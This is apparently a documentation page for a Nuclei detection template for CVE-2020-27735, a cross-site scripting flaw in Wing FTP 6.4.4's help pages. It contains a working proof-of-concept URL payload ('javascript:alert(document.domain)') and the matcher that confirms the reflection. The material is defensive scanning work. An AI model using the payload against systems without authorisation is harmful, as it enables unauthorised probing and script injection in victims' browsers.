Wing FTP 6.4.4 - Cross-Site Scripting
ID: CVE-2020-27735
Severity: medium
Author: pikpikcu
Tags: cve,cve2020,xss,wing-ftp,wftpserver
Description
Section titled “Description”Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user’s browser.
YAML Source
Section titled “YAML Source”id: CVE-2020-27735
info: name: Wing FTP 6.4.4 - Cross-Site Scripting author: pikpikcu severity: medium description: | Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.wftpserver.com/serverhistory.htm - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html - https://nvd.nist.gov/vuln/detail/CVE-2020-27735 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-27735 cwe-id: CWE-79 epss-score: 0.00228 epss-percentile: 0.60318 cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wftpserver product: wing_ftp_server tags: cve,cve2020,xss,wing-ftp,wftpserver
http: - method: GET path: - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
matchers-condition: and matchers: - type: word part: body words: - '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 490a0046304402207ee73f024c7af2b31f33ad3c728c5ff12d495ea850d939a1bb4b6cbaecdb27980220274d7ea2faba97ed91497b9d20a70e60fd8030cec84b18a4257781f42f652bc1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-27735.yaml"